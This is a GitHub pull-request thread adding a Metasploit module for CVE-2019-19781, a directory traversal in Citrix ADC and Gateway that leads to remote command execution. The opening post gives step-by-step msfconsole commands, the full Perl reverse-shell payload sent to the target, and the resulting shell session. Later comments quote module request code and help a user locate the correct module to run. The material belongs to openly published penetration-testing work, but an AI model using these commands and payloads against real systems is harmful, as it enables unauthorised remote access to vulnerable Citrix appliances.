add citrix path traversal exploit

[mekhalleh]

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Execute the following commands

msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > use exploit/unix/webapp/citrix_dir_trasversal_rce
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set rhost [IP]
rhost => XXX.XXX.XXX.XXX
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set lhost [IP]
lhost => XXX.XXX.XXX.XXX
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > set verbose true
verbose => true
msf5 exploit(unix/webapp/citrix_dir_trasversal_rce) > run

[*] Started reverse TCP handler on 0.0.0.0:XXXXX 
[+] The target appears to be vulnerable.
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"XXX.XXX.XXX.XXX:XXXXX");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Bookmark Added.
[*] Command shell session 1 opened (XXX.XXX.XXX.XXX:XXXXX -> XXX.XXX.XXX.XXX:XXXXX) at XXXX-XX-XX XX:XX:XX +0400

uname -a
FreeBSD xxxxxxxxxxxxxxx 8.4-NETSCALER-13.0 FreeBSD 8.4-NETSCALER-13.0 #0: Fri Oct 11 07:24:57 PDT 2019     root@xxx-xxxxx-xxx:/usr/obj/home/build/rs_130_41_9_RTM/usr.src/sys/NS64  amd64

[wvu-r7]

Hi! Thanks for this. We'll be making some final changes to the module and landing with #12813 as the exploit's check method if possible. I'll let you know when I'm ready to merge this. Thanks!

[wvu-r7]

I forgot about this, sorry:

metasploit-framework/modules/auxiliary/gather/pulse_secure_file_disclosure.rb

Line 52 in 0359a79

'HttpClientTimeout' => 5 # This seems sane, but it's not a float

metasploit-framework/modules/auxiliary/gather/pulse_secure_file_disclosure.rb

Lines 107 to 111 in 0359a79

	res = send_request_raw(
	'method' => 'GET',
	'uri' => dir_traversal(path),
	'partial' => true # Allow partial response due to timeout
	)

I'll add a decent default.

[wvu-r7]

Release Notes

This adds an exploit for CVE-2019-19781, a directory traversal vulnerability in Citrix ADC (NetScaler) that can be leveraged to execute an arbitrary command payload.

[wvu-r7]

@mekhalleh: The exploit has landed. Please review the commits I've added. I hope the changes are positive, and I apologize that I gave you such short notice on this. Thank you!

[jmartin-r7]

This takes advantage of #12517 & #12737 marking msf5.

[secprentice]

I am trying to use this exploit but cmd/unix/reverse_perl isnt working with the exploit nor does it come default with the exploit. Is this expected?

msf5 exploit(unix/webapp/citrix_access_gateway_exec) > use exploit/unix/webapp/citrix_dir_trasversal_rce

msf5 exploit(unix/webapp/citrix_access_gateway_exec) > set payload cmd/unix/reverse_per
[-] The value specified for payload is not valid.

I can however use cmd/unix/reverse_perl on its own?

msf5 payload(cmd/unix/reverse_perl) > use cmd/unix/reverse_perl

[wvu-r7]

That is an entirely different module.

[secprentice]

I must be missing something deathly obvious. Thanks for getting back to me, I will try some more to see what I am missing.

[wvu-r7]

The one you want is exploit/linux/http/citrix_dir_traversal_rce. Hope this helps!

[secprentice]

That helps a lot. A definite misunderstanding on my part. Thank you for the great module.